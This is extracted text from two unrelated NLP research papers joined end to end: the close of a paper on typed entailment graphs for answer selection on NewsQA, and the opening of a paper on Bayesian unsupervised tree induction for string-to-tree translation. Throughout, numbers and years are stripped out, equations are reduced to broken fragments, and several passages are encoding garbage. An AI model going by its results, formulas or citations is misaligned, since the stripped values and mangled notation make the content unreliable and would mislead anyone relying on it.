the fp errors are because of the normal- ization we currently perform on the relations, e.g., we remove modals and auxiliaries. the remain- ing errors are mostly due to parsing and our use of levy and dagan’s ( ) lemma based heuristic process. extrinsic evaluation to further test the utility of explicit entailment rules, we evaluate the learned rules on an ex- trinsic task: answer selection for machine read- ing comprehension on newsqa, a dataset that contains questions about cnn articles (trischler et al., ). machine reading comprehension is usually evaluated by posing questions about a text passage and then assessing the answers of a system (trischler et al., ). the datasets that are used for this task are often in the form of (document,question,answer) triples, where an- the board hailed romney for his solid credentials. who praised mitt romney’s credentials? researchers announced this week that they’ve found a new gene, als , which is responsible for . . . which gene did the als association dis- cover ? one out of every children under years old in america has a food allergy, and some will outgrow their sensitivities. how many americans suffer from food allergies? the reported compromise could itself run afoul of european labor law, opening the way for foreign workers . . . what law might the deal break? . . . barnes & noble ceo william lynch said as he unveiled his company ’s nook tablet on monday. who launched the nook tablet? the report said opium has accounted for more than half of afghanistan ’s gross domestic product in . what makes up half of afghanistans gdp ? table : examples where explicit entailment relations improve the rankings. the related words are boldfaced. swer is a short span of the document. answer selection is an important task where the goal is to select the sentence(s) that contain the answer. we show improvements by adding knowledge from our learned entailments without changing the graphs or tuning them to this task in any way. inverse sentence frequency (isf) is a strong baseline for answer selection (trischler et al., ). the isf score between a sentence si and a question q is defined as isf(si,q) =∑ w∈si∩q idf(w), where idf(w) is the inverse document frequency of the word w by considering each sentence in the whole corpus as one docu- ment. the state-of-the-art methods for answer se- lection use isf and by itself it already does quite well (trischler et al., ; narayan et al., ). we propose to extend the isf score with entail- ment rules. we define a new score isfent(si,q) = αisf(si,q) + ( −α)|{r ∈ si,r ∈ q : r → r }|, where α ∈ [ , ] is a hyper-parameter and r and r denote relations in the sentence and the ques- tion, respectively. the intuition is that if a sen- tence such as “luka modric sustained a fracture to his right fibula” is a paraphrase of or entails the answer of a question such as “what does luka modric suffer from?”, it will contain the answer span. we consider an entailment decision be- tween two typed predicates if their global similar- ity binc_cg_pr is higher than a threshold δ. we also considered entailments between unary relations (one argument) by leveraging our learned binary entailments. we split each binary entail- ment into two potential unary entailments. for example, the entailment visit , (:person,:location) → arrive ,in(:person,:location), is split acc mrr map isf . . . isfent . . . table : results (in percentage) for answer selection on the newsqa dataset. into visit (:person) → arrive (:person) and visit (:location) → arrivein(:location). we computed unary similarity scores by averaging over all related binary scores. this is particularly helpful when one argument is not present (e.g., adjuncts or wh questions) or does not exactly match between the question and the answer. we test the proposed answer selection score on newsqa, a dataset that contains questions about cnn articles (trischler et al., ). the dataset is collected in a way that encourages lexical and syntactic divergence between questions and doc- uments. the crowdworkers who wrote questions saw only a news article headline and its summary points, but not the full article. this process en- courages curiosity about the contents of the full article and prevents questions that are simple re- formulations of article sentences (trischler et al., ). this is a more realistic and suitable setting to test paraphrasing and entailment capabilities. we use the development set of the dataset ( samples) to tune α and δ and report results on the test set ( examples) in table . we ob- serve about . % improvement in accuracy (acc) and % improvement in mean reciprocal rank (mrr) and mean average precision (map), con- firming that entailment rules are helpful for an- swer selection. table shows some of the ex- the accuracy results of narayan et al. ( ) are not consistent with their own mrr and map (acc>mrr in come cases), as they break ties between isf scores differ- wij = (cij > λ )(cij −λ )/τij ( ) cij = w ij + ∑ (i′,j′)∈n(i,j) β(·)wi′j′ − (wij > ε)iε(wji) ∑ k∈v (τ (i),τ (i)) [ (wik −wjk) + (wki −wkj) ] + ∑ k∈v (τ (i),τ (i)) iε(wjk)iε(wkj)wik + iε(wik)iε(wki)wkj ( ) τij = + ∑ (i′,j′)∈n(i,j) β(·) + ∑ k∈v (τ (i),τ (i)) iε(wjk)iε(wkj) + iε(wik)iε(wki) ( ) β(·) = i ( − ( ∑ j∈v (τ (i),τ (i)) ∑ (i′,j′)∈n(i,j) (wij −wi′j′ ) ) /λ ) . ( ) figure : the update rules for wij and β(·). amples where isfent ranks the correct sentences higher than isf. these examples are very chal- lenging for methods that do not have entailment and paraphrasing knowledge, and illustrate the se- mantic interpretability of the entailment graphs. we also performed a similar evaluation on the stanford natural language inference dataset (snli; bowman et al., ) and obtained % improvement over a basic neural network archi- tecture that models sentences with an n-layered lstm (conneau et al., ). however, we did not get improvements over the state of the art re- sults because only a few of the snli examples re- quire external knowledge of predicate entailments. most examples require reasoning capabilities such as a∧b → b and simple lexical entailments such as boy → person, which are often present in the training set. conclusions and future work we have introduced a scalable framework to learn typed entailment graphs directly from text. we use global soft constraints to learn globally con- sistent entailment scores for entailment relations. our experiments show that generalizing in this way across different but related typed entail- ment graphs significantly improves performance over local similarity scores on two standard text- entailment datasets. we show around % in- crease in auc on levy/holt’s dataset and % on berant’s dataset. the method also outper- forms ppdb and the prior state-of-the-art entail- ment graph-building approach due to berant et al. ently when computing acc compared to mrr and map. see also http://homepages.inf.ed.ac.uk/scohen/ acl external-errata.pdf. ( ). paraphrase resolution further improves the results. we have in addition showed the util- ity of entailment rules on answer selection for ma- chine reading comprehension. in the future, we plan to show that the global soft constraints developed in this paper can be extended to other structural properties of entail- ment graphs such as transitivity. future work might also look at entailment relation learning and link prediction tasks jointly. the entailment graphs can be used to improve relation extrac- tion, similar to eichler et al. ( ), but cover- ing more relations. in addition, we intend to col- lapse cliques in the entailment graphs to para- phrase clusters with a single relation identifier, and to replace the form-dependent lexical semantics of the ccg parser with these form-independent rela- tions (lewis and steedman, a) and to use the entailment graphs to derive meaning postulates for use in tasks such as question-answering and con- struction of knowledge-graphs from text (lewis and steedman, ). appendix a figure shows the update rules of the learning al- gorithm. the global similarity scores wij are up- dated using eq. , where cij and τij are defined in eq. and eq. , respectively. (x) equals if the condition x is satisfied and zero, otherwise. the compatibility functions β(·) are updated using eq. . acknowledgements we thank thomas kober and li dong for help- ful comments and feedback on the work, reg- http://homepages.inf.ed.ac.uk/scohen/acl external-errata.pdf http://homepages.inf.ed.ac.uk/scohen/acl external-errata.pdf gie long for preliminary experiments on ope- nie extractions, and ronald cardenas for provid- ing baseline code for the newsqa experiments. the authors would also like to thank katrin erk and the three anonymous reviewers for their valu- able feedback. this work was supported in part by the alan turing institute under the epsrc grant ep/n / . the experiments were made possible by microsoft’s donation of azure cred- its to the alan turing institute. the research was supported in part by erc advanced fellow- ship ga semantax, a google faculty award, a bloomberg l.p. gift award, and a uni- versity of edinburgh/huawei technologies award to steedman. chambers was supported in part by the national science foundation under grant iis- . steedman and johnson were sup- ported by the australian research council’s dis- covery projects funding scheme (project number dp ). references omri abend, shay b. cohen, and mark steedman. . lexical inference over multi-word pred- icates: a distributional approach. in proceed- ings of the nd annual meeting of the associa- tion for computational linguistics, pages – . gabor angeli, melvin johnson premkumar, and christopher d. manning. . leveraging linguistic structure for open domain informa- tion extraction. in proceedings of the rd an- nual meeting of the association for computa- tional linguistics, pages – . jonathan berant, noga alon, ido dagan, and ja- cob goldberger. . efficient global learn- ing of entailment graphs. computational lin- guistics, : – . jonathan berant, ido dagan, meni adler, and ja- cob goldberger. . efficient tree-based approximation for entailment graph learning. in proceedings of the th annual meeting of the association for computational linguistics, pages – . jonathan berant, jacob goldberger, and ido da- gan. . global learning of typed entail- ment rules. in proceedings of the th annual meeting of the association for computational linguistics, pages – . kurt bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . freebase: a collaboratively created graph database for structuring human knowledge. in proceedings of the acm sigmod international conference on management of data, pages – . antoine bordes, nicolas usunier, alberto garcia- duran, jason weston, and oksana yakhnenko. . translating embeddings for modeling multi-relational data. in advances in neural information processing systems, pages – . samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural language inference. in proceedings of the conference on empirical methods in natural language processing, pages – . alexis conneau, douwe kiela, holger schwenk, loïc barrault, and antoine bordes. . su- pervised learning of universal sentence rep- resentations from natural language inference data. in proceedings of the conference on em- pirical methods in natural language process- ing, pages – . ido dagan, lillian lee, and fernando c.n. pereira. . similarity-based models of word cooccurrence probabilities. machine learning, ( - ): – . tim dettmers, minervini pasquale, stenetorp pontus, and sebastian riedel. . convolu- tional d knowledge graph embeddings. in proceedings of the th aaai conference on artificial intelligence, pages – . li dong, jonathan mallinson, siva reddy, and mirella lapata. . learning to paraphrase for question answering. in proceedings of the conference on empirical methods in natural language processing, pages – . bradley efron and robert tibshirani. . the bootstrap method for assessing statistical ac- curacy. behaviormetrika, ( ): – . kathrin eichler, feiyu xu, hans uszkoreit, and sebastian krause. . generating pattern- based entailment graphs for relation extrac- tion. in proceedings of the th joint confer- ence on lexical and computational semantics (* sem ), pages – . oren etzioni, anthony fader, janara christensen, stephen soderland, and mausam mausam. . open information extraction: the sec- ond generation. in proceedings of the nd in- ternational joint conference on artificial intel- ligence, pages – . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the para- phrase database. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – . maayan geffet and ido dagan. . the distri- butional inclusion hypotheses and lexical en- tailment. in proceedings of the rd annual meeting on association for computational lin- guistics, pages – . aurélie herbelot and mohan ganesalingam. . measuring semantic content in distributional vectors. in proceedings of the st annual meeting of the association for computational linguistics, pages – . xavier r. holt. . probabilistic models of relational implication. master’s thesis, mac- quarie university. dimitri kartsaklis and mehrnoosh sadrzadeh. . distributional inclusion hypothesis for tensor-based composition. in proceedings of the th international conference on compu- tational linguistics: technical papers, pages – . ross kindermann and j laurie snell. . markov random fields and their applications, volume . american mathematical society. philipp koehn. . statistical significance tests for machine translation evaluation. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . omer levy and ido dagan. . annotating re- lation inference in context via question an- swering. in proceedings of the th annual meeting of the association for computational linguistics, pages – . mike lewis. . combined distributional and logical semantics. ph.d. thesis, university of edinburgh. mike lewis and mark steedman. a. com- bined distributional and logical semantics. transactions of the association for computa- tional linguistics, : – . mike lewis and mark steedman. b. unsu- pervised induction of cross-lingual semantic relations. in proceedings of the conference on empirical methods in natural language pro- cessing, pages – . mike lewis and mark steedman. . combin- ing formal and distributional models of tem- poral and intensional semantics. in proceed- ings of the acl workshop on semantic parsing, pages – . dekang lin. . automatic retrieval and clus- tering of similar words. in proceedings of the th annual meeting of the association for computational linguistics, pages – . xiao ling and daniel s. weld. . fine- grained entity recognition. in proceedings of the national conference of the association for advancement of artificial intelligence, pages – . shashi narayan, ronald cardenas, nikos pa- pasarantopoulos, shay b. cohen, mirella lap- ata, jiangsheng yu, and yi chang. . doc- ument modeling with external attention for sentence extraction. in proceedings of the th annual meeting of the association for compu- tational linguistics, pages – . dat ba nguyen, johannes hoffart, martin theobald, and gerhard weikum. . aida- light: high-throughput named-entity disam- biguation. in workshop on linked data on the web, pages – . terence parsons. . events in the semantics of english: a study in subatomic semantics. mit press, cambridge, ma. ellie pavlick, pushpendre rastogi, juri gan- itkevitch, benjamin van durme, and chris callison-burch. . ppdb . : better para- phrase ranking, fine-grained entailment rela- tions, word embeddings, and style classifica- tion. in proceedings of the rd annual meet- ing of the association for computational lin- guistics, pages – . jeffrey pennington, richard socher, and christo- pher d. manning. . glove: global vec- tors for word representation. in proceedings of the conference on empirical methods in nat- ural language processing, pages – . siva reddy, mirella lapata, and mark steed- man. . large-scale semantic parsing with- out question-answer pairs. transactions of the association for computational linguistics, : – . sebastian riedel, limin yao, andrew mccallum, and benjamin m. marlin. . relation ex- traction with matrix factorization and univer- sal schemas. in proceedings of the conference of the north american chapter of the associ- ation for computational linguistics: human language technologies, pages – . stefan schoenmackers, oren etzioni, daniel s. weld, and jesse davis. . learning first- order horn clauses from web text. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – . richard socher, danqi chen, christopher d. man- ning, and andrew ng. . reasoning with neural tensor networks for knowledge base completion. in advances in neural information processing systems, pages – . mark steedman. . the syntactic process. mit press, cambridge, ma. idan szpektor and ido dagan. . learning en- tailment rules for unary templates. in pro- ceedings of the nd international conference on computational linguistics, pages – . adam trischler, tong wang, xingdi yuan, justin harris, alessandro sordoni, philip bachman, and kaheer suleman. . newsqa: a ma- chine comprehension dataset. in proceedings of the nd workshop on representation learn- ing for nlp, pages – . théo trouillon, johannes welbl, sebastian riedel, Éric gaussier, and guillaume bouchard. . complex embeddings for simple link pre- diction. in proceedings of the rd interna- tional conference on international conference on machine learning, pages – . yushi wang, jonathan berant, and percy liang. . building a semantic parser overnight. in proceedings of the rd annual meeting of the association for computational linguistics, pages – . julie weeds and david weir. . a gen- eral framework for distributional similarity. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . yangyang xu and wotao yin. . a block coordinate descent method for regularized multiconvex optimization with applications to nonnegative tensor factorization and com- pletion. siam journal on imaging sciences, ( ): – . bishan yang, wen-tau yih, xiaodong he, jian- feng gao, and li deng. . embedding en- tities and relations for learning and inference in knowledge bases. in proceedings of the in- ternational conference on learning represen- tations. naomi zeichner, jonathan berant, and ido dagan. . crowdsourcing inference-rule evalua- tion. in proceedings of the th annual meet- ing of the association for computational lin- guistics, pages – . congle zhang and daniel s. weld. . harvest- ing parallel news streams to generate para- phrases of event relations. in proceedings of the conference on empirical methods in natu- ral language processing, pages – . transactions of the association for computational linguistics, ( ) – . action editor: philipp koehn. submitted / ; revised / ; published / . c© association for computational linguistics. unsupervised tree induction for tree-based translation feifei zhai, jiajun zhang, yu zhou and chengqing zong national laboratory of pattern recognition, institute of automation, chinese academy of sciences, beijing, china {ffzhai,jjzhang,yzhou,cqzong}@nlpr.ia.ac.cn abstract in current research, most tree-based translation models are built directly from parse trees. in this study, we go in another direction and build a translation model with an unsupervised tree structure derived from a novel non-parametric bayesian model. in the model, we utilize synchronous tree substitution grammars (stsg) to capture the bilingual mapping between language pairs. to train the model efficiently, we develop a gibbs sampler with three novel gibbs operators. the sampler is capable of exploring the infinite space of tree structures by performing local changes on the tree nodes. experimental results show that the string-to- tree translation system using our bayesian tree structures significantly outperforms the strong baseline string-to-tree system using parse trees. introduction in recent years, tree-based translation models are drawing more and more attention in the community of statistical machine translation (smt). due to their remarkable ability to incorporate context structure information and long distance reordering into the translation process, tree-based translation models have shown promising progress in improving translation quality (liu et al., , ; quirk et al., ; galley et al., , ; marcu et al., ; shen et al., ; zhang et al., b). however, tree-based translation models always suffer from two major challenges: ) they are usually built directly from parse trees, which are generated by supervised linguistic parsers. a tree-based translation model is defined as a model using tree structures on one side or both sides. however, for many language pairs, it is difficult to acquire such corresponding linguistic parsers due to the lack of tree-bank resources for training. ) parse trees are actually only used to model and explain the monolingual structure, rather than the bilingual mapping between language pairs. this indicates that parse trees are usually not the optimal choice for training tree-based translation models (wang et al., ). based on the above analysis, we can conclude that the tree structure that is independent from tree-bank resources and simultaneously considers the bilingual mapping inside the bilingual sentence pairs would be a good choice for building tree- based translation models. therefore, complying with the above conditions, we propose an unsupervised tree structure for tree- based translation models in this study. in the structures, tree nodes are labeled by combining the word classes of their boundary words rather than by syntactic labels, such as np, vp. furthermore, using these node labels, we design a generative bayesian model to infer the final tree structure based on synchronous tree substitution grammars (stsg) . stsg is derived from the word alignments and thus can grasp the bilingual mapping effectively. training the bayesian model is difficult due to the exponential space of possible tree structures for each training instance. we therefore develop an efficient gibbs sampler with three novel gibbs operators for training. the sampler is capable of exploring the infinite space of tree structures by performing local changes on the tree nodes. we believe it is possible to design a model to infer the node label and tree structure jointly. we plan this as future work, and here, we focus only on inferring the tree structure in terms of the node labels derived from word classes. the tree structure formed in this way is independent from the tree-bank resources and simultaneously exploits the bilingual mapping effectively. experiments show that the proposed unsupervised tree (u-tree) is more effective and reasonable for tree-based translation than the parse tree. the main contributions of this study are as follows: ) instead of the parse tree, we propose a bayesian model to induce a u-tree for tree- based translation. the u-tree exploits the bilingual mapping effectively and does not rely on any tree-bank resources. ) we design a gibbs sampler with three novel gibbs operators to train the bayesian model efficiently. the remainder of the paper is organized as follows. section introduces the related work. section describes the stsg generation process, and section depicts the adopted bayesian model. section describes the gibbs sampling algorithm and gibbs operators. in section , we analyze the achieved u-trees and evaluate their effectiveness. finally, we conclude the paper in section . related work in this study, we move in a new direction to build a tree-based translation model with effective unsupervised u-tree structures. for unsupervised tree structure induction, denero and uszkoreit ( ) adopted a parallel parsing model to induce unlabeled trees of source sentences for syntactic pre-reordering. our previous work (zhai et al., ) designed an em- based method to construct unsupervised trees for tree-based translation models. this work differs from the above work in that we design a novel bayesian model to induce unsupervised u-trees, and prior knowledge can be encoded into the model more freely and effectively. blunsom et al. ( , , ) utilized bayesian methods to learn synchronous context free grammars (scfg) from a parallel corpus. the obtained scfg is further used in a phrase-based and hierarchical phrase-based system (chiang, ). levenberg et al. ( ) employed a bayesian method to learn discontinuous scfg rules. this study differs from their work because we concentrate on constructing tree structures for tree-based translation models. our u-trees are learned based on stsg, which is more appropriate for tree-based translation models than scfg. burkett and klein ( ) and burkett et al. ( ) focused on joint parsing and alignment. they utilized the bilingual tree-bank to train a joint model for both parsing and word alignment. cohn and blunsom ( ) adopted a bayesian method to infer an stsg by exploring the space of alignments based on parse trees. liu et al. ( ) re-trained the linguistic parsers bilingually based on word alignment. burkett and klein ( ) utilized a transformation-based method to learn a sequence of monolingual tree transformations for translation. compared to their work, we do not rely on any tree-bank resources and focus on generating effective unsupervised tree structures for tree-based translation models. zollmann and venugopal ( ) substituted the non-terminal x in hierarchical phrase-based model by extended syntactic categories. zollmann and vogel ( ) further labeled the scfg rules with pos tags and unsupervised word classes. our work differs from theirs in that we present a bayesian model to learn effective stsg translation rules and u-tree structures for tree-based translation models, rather than designing a labeling strategy for translation rules. the stsg generation process in this work, we induce effective u-trees for the string-to-tree translation model, which is based on a synchronous tree substitution grammar (stsg) between source strings and target tree fragments. we take stsg as the generation grammar to match the translation model. typically, such an stsg is a -tuple as follows: ( , , , , )s t t tg n s p ¦ ¦ where: i s¦ and t¦ represent the set of source and target words, respectively, i tn is the set of target non-terminals, i t ts n� is the start root non-terminal, and i p is the production rule set. generally, an stsg involves tree fragments on both sides. here we only consider the special case where the source side is actually a string. apart from the start non-terminal ts , we define all the other non-terminals in tn by word classes. inspired by (zollmann and vogel, ), we divide these non-terminals into three categories: one-word, two-word and multi-word non-terminals. the one-word non-terminal is a word class, such as c, meaning that it dominates a word whose word class is c. two-word non-terminals are used to stand for two word strings. they are labeled in the form of c +c , where c and c are the word classes of the two words separately. accordingly, multi-word non-terminals represent the strings containing more than two words. they are labeled as c …cn, demanding that the word classes of the leftmost word and the rightmost word are c and cn, respectively. we use pos tag to play the role of word class . for example, the head node of the rule in figure is a multi-word non-terminal prp…rb. it requires that the pos tags of the leftmost and rightmost word must be prp and rb, respectively. xiong et al. ( ) showed that the boundary word is an effective indicator for phrase reordering. thus, we believe that combining the word class of boundary words can denote the whole phrase well. prp...rb we prp vbp:x rb:x vbp+rb ᡁԜ x x wo-men figure . an example of an stsg production rule. each production rule in p consists of a source string and a target tree fragment. in the target tree fragment, each internal node is labeled with a non- terminal in tn , and each leaf node is labeled with either a target word in t¦ or a non-terminal in tn . the source string in a production rule comprises source words and variables. each variable corresponds to a leaf non-terminal in the target tree fragment. in the stsg, the production rule is used to rewrite the root node into a string and a tree fragment. for example, in figure , the rule rewrites the head node prp…rb into the corresponding string and fragment. an stsg derivation refers to the process of generating a specific source string and target tree the demand of a pos tagger impairs the independence from manual resources to some extent. in future, we plan to design a method to learn effective unsupervised labels for the non-terminals. structure by production rules. this process begins with the start non-terminal ts and an empty source string. we repeatedly choose production rules to rewrite the leaf non-terminals and expand the string until no leaf non-terminal is left. finally, we acquire a source string and a target tree structure defined by the derivation. the probability of a derivation is given as follows: ( ) ( | ) n i i i p d p r n � ( ) where the derivation comprises a sequence of rules d=(r ,…,rn), and ni represents the root node of rule ri. hence, for a specific bilingual sentence pair, we can generate the best target-side tree structure based on the stsg, independent from the tree- bank resources. the stsg used in the above process is learned by the bayesian model that is detailed in the next section. actually, scfg can also be used to build the u- trees. we do not use scfg because most of the tree-based models are based on stsg. in our bayesian model, the u-trees are optimized through selecting a set of stsg rules. these stsg rules are consistent with the translation rules used in the tree-based models. another reason is that stsg has a stronger expressive power on tree construction than scfg. in a stsg-based u-tree or a stsg rule, although not linguistically informed, the nodes labeled by pos tags are also effective on distinguishing different ones. however, with scfg, we have to discard all the internal nodes (i.e., flattening the u- trees or rules) to express the same sequence, leading to a poor ability of distinguishing different u-trees and production rules. thus, using stsg, we can build more specific u-trees for translation. in addition, we find that the bayesian scfg grammar cannot even significantly outperform the heuristic scfg grammar (blunsom et al. ) . this would indicate that the scfg-based derivation tree as by-product is also not such good for tree-based translation models. considering the above reasons, we believe that the stsg-based learning procedure would result in a better translation grammar for tree-based models. in (blunsom et al., ), for chinese-to-english translation, the bayesian scfg grammar only outperform the heuristic scfg grammar by . bleu points on nist mt and . bleu points on nist mt in the news domain. bayesian model in this section, we present a bayesian model to learn stsg defined in section . in the model, we use șn to denote the probability distribution ( | )p r n in equation ( ). șn follows a multinomial distribution and we impose a dirichlet prior (dp) on it: | ~ ( ) | , ~ ( , ( | ) ) n n n n r n multi p dp p n t t d d < ( ) where ( | )p n< (base distribution) is used to assign prior probabilities to the stsg production rules. Įn controls the model’s tendency to either reuse existing rules or create new ones using the base distribution ( | )p n< . instead of denoting the multinomial distribution explicitly with a specific șn, we integrate over all possible values of șn to achieve the probabilities of rules. this integration results in the following conditional probability for rule ri given the previously observed rules r-i = r ,…, ri- : ( | ) ( | , , , ) i i r n ii i n i n n n p r n p r r n p n d d d � � � � � ( ) where n-i ri denotes the number of ri in ir� , and n -i n represents the total count of rules rewriting non- terminal n in ir� . thanks to the exchangeability of the model, all permutations of the rules are actually equiprobable. this means that we can compute the probability of each rule based on the previous and subsequent rules (i.e. consider each rule as the last one). this characteristic allows us to design an efficient gibbs sampling algorithm to train the bayesian model. . base distribution the base distribution ( | )p r n is designed to assign prior probabilities to the stsg production rules. because each rule r consists of a target tree fragment frag and a source string str in the model, we follow cohn and blunsom ( ) and decompose the prior probability ( | )p r n into two factors as follows: ( | ) ( | ) ( | )p r n p frag n p str frag � ( ) where ( | )p frag n is the probability of producing the target tree fragment frag. to generate frag, cohn and blunsom ( ) used a geometric prior to decide how many child nodes to assign each node. differently, we require that each multi-word non-terminal node must have two child nodes. this is because the binary structure has been verified to be very effective for tree-based translation (wang et al., ; zhang et al., a). the generation process starts at root node n. at first, root node n is expanded into two child nodes. then, each newly generated node will be checked to expand into two new child nodes with probability pexpand. this process repeats until all the new non-terminal nodes are checked. obviously, pexpand controls the scale of tree fragments, where a large pexpand corresponds to large fragments . the new terminal nodes (words) are drawn uniformly from the target-side vocabulary, and the non- terminal nodes are created by asking two questions as follows: ) what type is the node, one-word, two- word or multi-word non-terminal? ) what tag is used to label the node? the answer to question ) is chosen from a uniform distribution, i.e., the probability is / for each type of non-terminal. the entire generation process is in a top-down manner, i.e., generating a parent node first and then its children. with respect to question ), because the father node has determined the pos tags of boundary words, we only need one pos tag to generate the label of the current node. for example, in figure , as the father node prp…rb demands that the pos tag of the rightmost word is rb, the right child of prp…rb must also satisfy this condition. therefore, we choose a pos tag vbp and obtain the label vbp+rb. the pos tag is drawn uniformly from the pos tag set. if the current node is a one-word non-terminal, question ) is unnecessary. similarly, with respect to the two- word non-terminal node, questions ) and ) are both unnecessary for its two child nodes because they have already been defined by their father node. as an example of the generative process, the tree fragment in figure is created as follows: a. determine that the left child of prp…rb is a one-word non-terminal (labeled with prp); b. expand prp and generate the word “we” for prp; in our experiment, we set pexpand to / to encourage small tree fragments. c. determine that the right child of prp…rb is a two-word non-terminal; d. utilize the predetermined rb and a pos tag vbp to form the tag of the two-word non- terminal: vbp+rb; e. expand vbp+rb (to vbp and rb); f. do not expand vbp and rb. ( | )p str frag in equation ( ) is the probability of generating the source string, which contains several source words and variables. inspired by (blunsom et al., ) and (cohn and blunsom, ), we define ( | )p str frag as follows: var ( | ) ( ; ) | | poisson sw sw sw c c s i p str frag p c c i u u ¦ �� ( ) where csw is the number of words in the source string. �s means the source vocabulary set. further, cvar denotes the number of variables, which is determined by the tree fragment frag. as shown in equation( ), we first determine how many source words to generate using a poisson distribution ppoisson(csw; ), which imposes a stable preference for short source strings. then, we draw each source word from a uniform distribution over �s. afterwards, we insert the variables into the string. the variables are inserted one at a time using a uniform distribution over the possible positions. this factor discourages more variables. for the example rule in figure , the generative process of the source string is: a. decide to generate one source word; b. generate the source word “ᡁԜ (wo-men) ”; c. insert the first variable after the word; d. insert the second variable between the word and the first variable. intuitively, a good translation grammar should carry both small translation rules with enough generality and large rules with enough context information. denero and klein ( ) proposed this statement, and cohn and blunsom ( ) has verified it in their experiments with parse trees. our base distribution is also designed based on this intuition. considering the two factors in our base distribution, we penalize both large target tree fragments with many nodes and long source strings with many words and variables. the bayesian model tends to select both small and frequent stsg production rules to construct the u-trees. with these types of trees, we can extract small rules with good generality and simultaneously obtain large rules with enough context information by composition. we will show the effectiveness of our u-trees in the verification experiment. model training by gibbs sampling in this section, we introduce a collapsed gibbs sampler, which enables us to train the bayesian model efficiently. . initialization state at first, we use random binary trees to initialize the sampler. to get the initial u-trees, we recursively and randomly segment a sentence into two parts and simultaneously create a tree node to dominate each part. the created tree nodes are labeled by the non-terminals described in section . using the initial target u-trees, source sentences and word alignment, we extract minimal ghkm translation rules in terms of frontier nodes (galley et al., ). frontier nodes are the tree nodes that can map onto contiguous substrings on the source side via word alignment. for example, the bold italic nodes with shadows in figure are frontier nodes. in addition, it should be noted that the word alignment is fixed , and we only explore the entire space of tree structures in our sampler. differently, cohn and blunsom ( ) designed a sampler to infer an stsg by fixing the tree structure and exploring the space of alignment. we believe that it is possible to investigate the space of both tree structure and alignment simultaneously. this subject will be one of our future work topics. for each training instance (a pair of source sentence and target u-tree structure), the extracted ghkm minimal translation rules compose a unique stsg derivation . moreover, all the rules developed from the training data constitute an initial stsg for the gibbs sampler. we attach the unaligned word to the lowest frontier node that can cover it in terms of word alignment. the sampler might reinforce the frequent alignment errors (ae), which would harm the translation model (tm). actually, the frequent aes also greatly impair the conventional tm. besides, our sampler encourages the correct alignments and simultaneously discourages the infrequent aes. thus, compared with the conventional tms, we believe that our final tm would not be worse due to aes. our final experiments verify this point and we will conduct a much detailed analysis in future. we only use the minimal ghkm rules (galley et al., ) here to reduce the complexity of the sampler. jin-tian jian-mianwo-men zai-ci prp+vbp today nn we prp meet vbp again rb Ӻཙ ᡁԜ ⅑޽ 㿱䶒 prp...rb nn...rb figure . illustration of an initial u-tree structure. the bold italic nodes with shadows are frontier nodes. under this initial stsg, the sampler modifies the initial u-trees (initial sample) to create a series of new ones (new samples) by the gibbs operators. consequently, new stsgs are created based on the new u-trees simultaneously and used for the next sampling operation. repeatedly and after a number of iterations, we can obtain the final u-trees for building translation models. . the gibbs operators in this section, we develop three novel gibbs operators for the sampler. they explore the entire space of the u-tree structures by performing local changes on the tree nodes. for a u-tree of a given sentence, we define s- node as the non-root node covering at least two words. thus, the set of s-node contains all the tree nodes except the root node, the pre-terminal nodes and leaf nodes, which we call non-s-node. for example, in figure , prb…rb and prp+vbp are s-nodes, while nn and nn…rb are non-s-nodes. since the pos tag sequence of the sentence is fixed, all non-s-nodes would stay unchanged in all possible u-trees of the sentence. based on this fact, our gibbs operators work only on s-nodes. further, we assign descendant candidates (dc) for each s-node: its left child, right child and its sibling. for example, in figure , the dcs for the s-node are node prp, vbp and rb respectively. according to the different dcs it governs, every s- node might be in one of the two different states: ) left state: as figure (a) shows, the s-node governs the left two dcs, prp and vbp, and is labeled prp+vbp. ) right state: as figure (b) shows, the s-node governs the right two dcs, vbp and rb, and is labeled vbp+rb. for a specific u-tree, the states of s-nodes are fixed. thus, by changing an s-node’s state, we can easily transform this u-tree to another one, i.e., from the current sample to a new one. to formulate the u-tree transformation process, we associate a binary variable Ȍ䌜{ , } with each s-node, indicating whether the s-node is in the left �Ȍ �� or right state �Ȍ ��� then we can change the u-tree by changing value of the Ȍ parameters. our first gibbs operator, rotate, just works by sampling value of the Ȍ�parameters, one at a time, and changing the u-tree accordingly. for example, in figure (a), the s-node is currently in the left vwdwh��Ȍ ����:h�vdpsoh�wkh�Ȍ�ri�wklv�qrgh��dqg�li� wkh�vdpsohg�ydoxh�ri�Ȍ�lv����zh�nhhs�wkh�vwuxfwxuh� unchanged, i.e., in the left state. otherwise, we change its state to the right state �Ȍ ��, and transform the u-tree to figure (b) accordingly. jian-mianwo-men zai-ci s-node we prp meet vbp again rb ᡁԜ ⅑޽ 㿱䶒 prp...rb prp+vbp jian-mianwo-men zai-ci s-node we prp meet vbp again rb ᡁԜ ⅑޽ 㿱䶒 prp...rb vbp+rb (b) Ȍ= (a) Ȍ= rotate figure . illustration of the rotate operator. in the figure, (a) and (b) denote the s-node’s left state and right state respectively. the bold italic nodes with shadows in the figure are frontier nodes. obviously, towards an s-node for sampling, the two values of Ȍ would define two different u-trees. using the ghkm algorithm (galley et al. ), we can get two different stsg derivations from the two u-trees based on the fixed word alignment. each derivation carries a set of stsg rules (i.e., minimal ghkm translation rules) of its own. in the two derivations, the stsg rules defined by the two states include the one rooted at the s-node’s lowest ancestor frontier node, and the one rooted at the s-node if it is a frontier node. for instance, in figure (a), as the s-node is not a frontier node, the left state (Ȍ �) defines only one rule: : ... ( ( : : ) : ) leftr x x x prp rb prp vbp x prp x vbp x rb o � differently, in figure (b), the s-node is a frontier node and thus the right state (Ȍ ) defines two rules: : ... ( : : ) : ( : : ) right right r x x prp rb x prp x vbp rb r x x vbp rb x vbp x rb � � o � o � using these stsg rules, the two derivations are evaluated as follows (we use the value of Ȍ to denote the corresponding stsg derivation): ( ) ( | ) ( ) ( , | ) ( | ) ( | , ) left right right right right right p p r r p p r r r p r r p r r r � � � � � � � � � < v < v where r � refers to the conditional context, i.e., the set of all other rules in the training data. all the probabilities in the above formulas are computed by equation( ). we then normalize the two scores and sample a value of Ȍ based on them. with the bayesian model described in section , the sampler 